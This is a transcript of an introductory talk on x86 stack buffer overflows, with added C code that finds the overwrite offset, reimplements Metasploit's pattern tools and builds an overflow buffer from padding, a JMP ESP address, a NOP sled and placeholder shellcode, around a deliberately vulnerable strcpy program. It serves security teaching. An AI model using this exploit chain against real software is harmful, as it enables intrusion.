Transcript
1. BUFFER OVERFLOWS 101: SOME ASSEMBLY REQUIRED. Kory Kyzar
2. This talk is: very high level; restricted to stack buffer overflows; restricted to the x86 architecture.
3. What's a buffer? A buffer can be thought of as an allocated space in memory intended to hold a certain amount of data. char A[10]; allocates 10 bytes for the variable A.
4. OK, and overflow? Storing more data in the buffer than it is designed to hold. strcpy(A, toomuchdata); (Diagram: the string "toomuchdata" spilling past the end of A.) Data is written to memory outside the region allocated to A. We've overflowed the buffer.
5. So What Happens?
6. Crash
7. Score
8. So how do we score?
9. So how do we score? Slow down there Romeo.
11. CPU REGISTERS
12. General Purpose Registers: small storage areas on the CPU that allow for very fast access. 32-bit x86 CPUs have 8 general purpose registers (EAX, EBX, ECX, EDX, ESI, EDI, EBP, ESP). Basically, data from memory is loaded into a register, some form of processing is done, then the data is saved back to memory. The main ones we are concerned with are EBP and ESP. EIP is not considered a general purpose register, but we are interested in it as well.
13. EBP - The Base Pointer: used to track the base of the current frame (function). Can be used for other purposes (a compiler that omits the frame pointer reuses EBP as an ordinary register).
14. ESP - The Stack Pointer: used to track the top of the stack. As data is moved onto the stack (PUSH) or off of it (POP), ESP is decremented or incremented accordingly. The stack grows toward lower addresses, so PUSH subtracts 4 from ESP and POP adds 4.
15. EIP - Instruction Pointer: always points to the memory address of the next instruction to be executed by the CPU.
17. THE STACK
18. What is the stack? A data structure that stores values contiguously in memory. Last In, First Out structure. The ESP register marks the top of the stack.
19. Assume the below program (from https://en.wikipedia.org/wiki/Stack_buffer_overflow):

    #include <string.h>

    void foo(char *bar)
    {
        char A[10];
        strcpy(A, bar);   // no bounds checking
    }

    int main(int argc, char **argv)
    {
        if (argc > 1)     // only so the program does not dereference a missing argv[1]
            foo(argv[1]);
        return 0;
    }

    The program simply takes an argument on the command line and copies it into a variable that is allocated 10 bytes (A).
20. Stack - Program initializes: main's frame is on the stack (diagram: high memory addresses at the top, low memory addresses at the bottom); EBP and ESP both point into main's frame.
21. Stack - foo function called: the CALL instruction pushes the return address (ret address) on top of main's frame, so execution can resume in main after foo returns.
23. Stack - foo function called: foo's prologue pushes the caller's EBP (saved EBP) below the return address.
24. Stack - foo function called: EBP is set to ESP (MOV EBP, ESP), so both now point at the saved EBP slot, the base of foo's frame.
25. Stack - foo function called: 10 bytes are reserved for A below the saved EBP by subtracting from ESP; ESP now points at the low end of A. Reading upward from A: saved EBP, then ret address, then main's frame.
26. Stack - strcpy(): assume we executed our program with an argument of AAAAAAAAAA (10 bytes). The ten bytes fill A (diagram: AAAA AAAA AA); saved EBP and ret address are untouched. (Strictly, strcpy also writes the terminating NUL, so a 10-character argument already writes one byte past A.)
27. Stack - strcpy(): now let's put our attacker hat on and execute our program with the argument AAAAAAAAAAAAAAAAAA (18 bytes). strcpy fills A (10 bytes) and keeps writing upward: the next 4 bytes overwrite saved EBP and the 4 after that overwrite the ret address, both becoming 0x41414141 (diagram: AAAA AAAA AA AAAA AAAA). We just overwrote the RET address, meaning we can tell the CPU which instruction to execute next.
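The frame layout drawn in slides 20 to 27 can be measured instead of assumed. The following is an added example, not code from the talk: it mirrors foo() with a 10-byte local buffer and uses the GCC/Clang builtins __builtin_frame_address and __builtin_return_address to compute how far above A[0] the saved frame pointer slot and the return address slot sit, then reads the return address slot back to confirm it. It is written for whatever pointer size the compiler targets (4 bytes on the talk's 32-bit x86, 8 bytes on x86-64), and the distances it reports depend on compiler, alignment padding and stack protector, which is why the offset has to be measured rather than taken from a drawing.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>

/* What we measure from inside a foo()-like frame. */
struct frame_layout {
    ptrdiff_t a_to_frame;     /* bytes from A[0] up to the saved frame pointer slot */
    ptrdiff_t a_to_ret;       /* bytes from A[0] up to the return address slot      */
    int       ret_slot_valid; /* 1 if that slot really holds our return address     */
};

/* Mirrors foo() from the slides: a 10-byte local buffer in a frame of its own.
   noinline keeps it a real call with its own CALL/RET, prologue and frame. */
__attribute__((noinline))
struct frame_layout measure_frame(void)
{
    char A[10];
    volatile char *keep = A;   /* make sure A really lives on the stack */
    keep[0] = 'A';

    /* GCC/Clang builtin: the address of this frame's saved-EBP slot (saved RBP on
       x86-64). The return address that CALL pushed sits one pointer-width above it. */
    uintptr_t frame    = (uintptr_t)__builtin_frame_address(0);
    uintptr_t ret_slot = frame + sizeof(void *);

    struct frame_layout fl;
    fl.a_to_frame = (ptrdiff_t)(frame - (uintptr_t)A);
    fl.a_to_ret   = (ptrdiff_t)(ret_slot - (uintptr_t)A);

    /* Read the slot and compare with the return address the compiler knows.
       A match means: a_to_ret bytes of padding written into A, followed by one
       pointer-width of attacker data, is exactly what RET loads into EIP (RIP). */
    void *in_slot = *(void * volatile *)ret_slot;
    fl.ret_slot_valid = (in_slot == __builtin_return_address(0));
    return fl;
}

/* Small accessors so each number can be checked on its own. */
ptrdiff_t offset_to_saved_frame_pointer(void) { return measure_frame().a_to_frame; }
ptrdiff_t offset_to_return_address(void)      { return measure_frame().a_to_ret; }
int       return_slot_verified(void)          { return measure_frame().ret_slot_valid; }

int main(void)
{
    struct frame_layout fl = measure_frame();
    printf("saved frame pointer slot: %td bytes above A[0]\n", fl.a_to_frame);
    printf("return address slot:      %td bytes above A[0] (%s)\n", fl.a_to_ret,
           fl.ret_slot_valid ? "verified by reading it back" : "NOT verified");
    printf("so strcpy() into A needs %td + %zu bytes to replace the return address\n",
           fl.a_to_ret, sizeof(void *));
    return 0;
}
```

Build it with -m32 to see the talk's 4-byte slots; with a stack protector enabled the saved frame pointer lands more than 10 bytes above A[0] because the canary sits in between, which is also why a real target is probed with a pattern rather than with a number read off a diagram.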
31. CONGRATULATIONS! YOU CRASHED.
32. Buffer Overflow Shopping List. We need: the offset in the buffer at which EIP is overwritten (that is, where the saved return address sits, since RET loads EIP from it); code to perform the exploit; a way to direct EIP to the code we want to run.
33. What if the buffer you were trying to overflow was larger than 10 bytes? Let's say we have a large buffer of an unknown size. We could write a fuzzer that submits an increasing number of A's and make note of the length that causes the crash. But how do we know which of the A's overwrote EIP?
34. Finding the offset: pattern_create.rb is a Ruby script (shipped with Metasploit) that creates a non-repeating sequence of characters of a given length.
35. Finding the offset: using the string generated by pattern_create.rb as your input, you would analyze where the program crashed in a debugger (e.g. "Access violation when executing 30614239"). Then you would check where that series of characters was in the string with pattern_offset.rb, which accounts for x86 being little-endian: EIP = 0x30614239 means the bytes 39 42 61 30, i.e. the characters 9Ba0, were at the return address slot. Now you have the exact position in the buffer to place your return address.
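The two Metasploit scripts on the previous slides do something simple enough to reimplement in a few lines, and doing so makes the little-endian step explicit. The following is an added example, not code from the talk or from Metasploit: pattern_create() emits the same cyclic Aa0Aa1...Az9Ba0... sequence pattern_create.rb does, and pattern_offset() takes the EIP value the debugger reported, turns it back into the four bytes that were in memory, and searches for them. The crash value 0x30614239 is the one from the slide; the 2000-byte pattern length is an assumption standing in for the length that caused the crash.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Fill out[] with the cyclic pattern Aa0Aa1Aa2...Aa9Ab0...Az9Ba0... (the sequence
   pattern_create.rb emits), stopping after len bytes. out must hold len + 1 bytes.
   Every 4-byte window is unique until the pattern wraps after 26*26*10*3 = 20280. */
size_t pattern_create(char *out, size_t len)
{
    size_t n = 0;
    for (int u = 'A'; u <= 'Z' && n < len; u++)
        for (int l = 'a'; l <= 'z' && n < len; l++)
            for (int d = '0'; d <= '9' && n < len; d++) {
                char triple[3] = { (char)u, (char)l, (char)d };
                for (int i = 0; i < 3 && n < len; i++)
                    out[n++] = triple[i];
            }
    out[n] = '\0';
    return n;
}

/* Character at position i of the pattern (for spot checks). */
char pattern_char_at(size_t i)
{
    char *p = malloc(i + 2);
    if (!p) return '\0';
    pattern_create(p, i + 1);
    char c = p[i];
    free(p);
    return c;
}

/* What pattern_offset.rb does: the debugger shows EIP as a 32-bit number, but on
   little-endian x86 the four bytes that were popped into it sat in memory low byte
   first, so 0x30614239 was the characters "9Ba0". Find those bytes in a pattern of
   the length that was sent; return the offset, or -1 if the value is not from it. */
long pattern_offset(uint32_t eip, size_t len)
{
    char *pat = malloc(len + 1);
    if (!pat) return -1;
    pattern_create(pat, len);
    unsigned char needle[4] = {
        (unsigned char)(eip & 0xff),         (unsigned char)((eip >> 8) & 0xff),
        (unsigned char)((eip >> 16) & 0xff), (unsigned char)((eip >> 24) & 0xff)
    };
    long found = -1;
    for (size_t i = 0; i + 4 <= len; i++)
        if (memcmp(pat + i, needle, 4) == 0) { found = (long)i; break; }
    free(pat);
    return found;
}

int main(void)
{
    char head[32];
    pattern_create(head, 30);
    printf("pattern starts: %s...\n", head);
    printf("EIP 0x30614239 -> offset %ld\n", pattern_offset(0x30614239, 2000));
    return 0;
}
```

A -1 from pattern_offset() is itself useful information: the value in EIP did not come from your pattern, so either the crash is somewhere other than the return address or the input was transformed (truncated at a NUL, case-folded, re-encoded) before it reached the stack.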
36. Shellcode: assembly code generated to execute the payload of the attacker's choice. Shellcode must be carefully crafted by hand. RIGHT?
38. MSFVENOM: msfpayload and msfencode have been deprecated in favor of msfvenom, which generates (and encodes) the shellcode for you.
39. So where do we point EIP? We need to get the CPU to execute our shellcode. So just set EIP to the address at the beginning of your shellcode!?
41. Setting the RET address: you can't hardcode a stack address, since the program (and its stack) will be loaded into different places in memory at each execution. JMP ESP - one of the most common methods of getting back to your shellcode is to point EIP at a JMP ESP instruction that lives at a fixed address (in a module loaded without ASLR). When RET pops the overwritten return address, ESP is left pointing at the bytes that sit right after it in our buffer, so JMP ESP sends execution into whatever we placed there, which is where we put our shellcode.
42. Putting it all together, our crafted buffer overflow is laid out as: [Padding up to the offset][EIP = address of JMP ESP][NOP Sled][Shellcode][Padding].
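The layout on the previous slide, built as bytes. This is an added example, not code from the talk: build_overflow() lays out padding up to the offset, the JMP ESP address in little-endian byte order, a NOP sled, the shellcode and trailing padding, and refuses to build the buffer if the address or shellcode contains a bad character, since a strcpy() overflow stops copying at the first 0x00. All demo inputs are constructed: the offset 779 is what pattern_offset gives for the slide's 0x30614239 crash, the JMP ESP address 0x7C941EED is hypothetical, and the "shellcode" is four INT3 breakpoints (0xCC), a stand-in for msfvenom output while the chain is being tested, not a payload.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NOP 0x90   /* x86 one-byte NOP, used to build the sled */

/* x86 is little-endian: the address 0x7C941EED must be laid down as ED 1E 94 7C,
   or RET loads the byte-reversed value into EIP. */
static void put_le32(unsigned char *dst, uint32_t v)
{
    dst[0] = (unsigned char)(v & 0xff);
    dst[1] = (unsigned char)((v >> 8) & 0xff);
    dst[2] = (unsigned char)((v >> 16) & 0xff);
    dst[3] = (unsigned char)((v >> 24) & 0xff);
}

/* 1 if any byte of buf[0..len) is in the bad-character set bad[0..nbad). For a
   strcpy() overflow 0x00 is always bad: the copy stops there and nothing after lands. */
static int has_badchar(const unsigned char *buf, size_t len,
                       const unsigned char *bad, size_t nbad)
{
    for (size_t i = 0; i < len; i++)
        for (size_t j = 0; j < nbad; j++)
            if (buf[i] == bad[j])
                return 1;
    return 0;
}

/* Lay out [padding up to offset][JMP ESP address][NOP sled][shellcode][trailing padding].
   Returns a malloc'd buffer of total bytes (*out_len), or NULL when the address or
   shellcode contains a bad character or total is too small to hold everything. */
static unsigned char *build_overflow(size_t offset, uint32_t jmp_esp,
                                     const unsigned char *shellcode, size_t sc_len,
                                     size_t sled, size_t total,
                                     const unsigned char *bad, size_t nbad,
                                     size_t *out_len)
{
    unsigned char addr[4];
    put_le32(addr, jmp_esp);
    if (has_badchar(addr, 4, bad, nbad) || has_badchar(shellcode, sc_len, bad, nbad))
        return NULL;
    if (offset + 4 + sled + sc_len > total)
        return NULL;

    unsigned char *buf = malloc(total);
    if (!buf)
        return NULL;
    memset(buf, 'A', total);                    /* padding, like the A's in the talk */
    memcpy(buf + offset, addr, 4);              /* lands on the saved return address */
    memset(buf + offset + 4, NOP, sled);        /* ESP points here after RET: the sled */
    memcpy(buf + offset + 4 + sled, shellcode, sc_len);
    *out_len = total;
    return buf;
}

/* Constructed demo inputs (not real exploit data): assumed offset, a hypothetical
   JMP ESP address, and four INT3 breakpoints standing in for shellcode. */
static const size_t        DEMO_OFFSET      = 779;
static const uint32_t      DEMO_JMP_ESP     = 0x7C941EED;
static const unsigned char DEMO_SHELLCODE[] = { 0xCC, 0xCC, 0xCC, 0xCC };
static const unsigned char DEMO_BAD[]       = { 0x00 };
#define DEMO_SLED  16
#define DEMO_TOTAL 1000

/* Byte i of the demo buffer, or -1 if it cannot be built or i is out of range. */
int demo_byte_at(size_t i)
{
    size_t len;
    unsigned char *b = build_overflow(DEMO_OFFSET, DEMO_JMP_ESP, DEMO_SHELLCODE,
                                      sizeof DEMO_SHELLCODE, DEMO_SLED, DEMO_TOTAL,
                                      DEMO_BAD, sizeof DEMO_BAD, &len);
    if (!b || i >= len) { free(b); return -1; }
    int v = b[i];
    free(b);
    return v;
}

/* 1 if a buffer can be built with this JMP ESP address under the demo bad-char set. */
int demo_accepts_address(uint32_t jmp_esp)
{
    size_t len;
    unsigned char *b = build_overflow(DEMO_OFFSET, jmp_esp, DEMO_SHELLCODE,
                                      sizeof DEMO_SHELLCODE, DEMO_SLED, DEMO_TOTAL,
                                      DEMO_BAD, sizeof DEMO_BAD, &len);
    int ok = (b != NULL);
    free(b);
    return ok;
}

int main(void)
{
    size_t end = DEMO_OFFSET + 4 + DEMO_SLED + sizeof DEMO_SHELLCODE + 2;
    for (size_t i = DEMO_OFFSET - 2; i < end; i++)
        printf("%4zu: %02x\n", i, demo_byte_at(i));
    return 0;
}
```

The bad-character check is the part most often skipped in a first attempt: an address such as 0x00401000 looks perfectly good in a disassembler, but its 0x00 bytes end the strcpy() before the sled and shellcode are ever written, which is why the builder rejects it outright.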
43. DEMO? THIS WILL PROBABLY END IN FLAMES
44. @0XKTWO [email protected]
